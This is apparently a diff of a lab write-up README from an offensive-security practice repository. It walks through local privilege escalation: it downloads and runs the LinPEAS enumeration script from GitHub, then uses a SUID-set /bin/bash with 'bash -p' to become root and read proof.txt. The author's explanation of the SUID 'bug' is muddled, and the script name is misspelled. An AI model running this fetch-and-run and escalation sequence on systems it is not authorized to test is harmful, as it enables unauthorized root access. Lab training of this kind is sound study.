Toufa7/offseclabs/README.md

 Let's scan with a tool just trying to search for possible and available exploits i'm using Linpeas :

-	wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh ; chmod +x linpeas.sh | ./linepeas
+	wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh ; chmod +x linpeas.sh ; ./linepeas

 though the scan of Linepeas we've noticed a suid in the bash builtin command (indicates that the file has the setuid bit set) which means we can gain access through a ;

 	/bin/bash -p
 	whoami

 with the -p option through some googling it turns up it's a bug that allows the default shell to run with SUID privileges meaning that we have permission to run with the owner privilege

-I gain access and I become a root
+I gain access and i become a root

 	cd /root/ ; cat proof.txt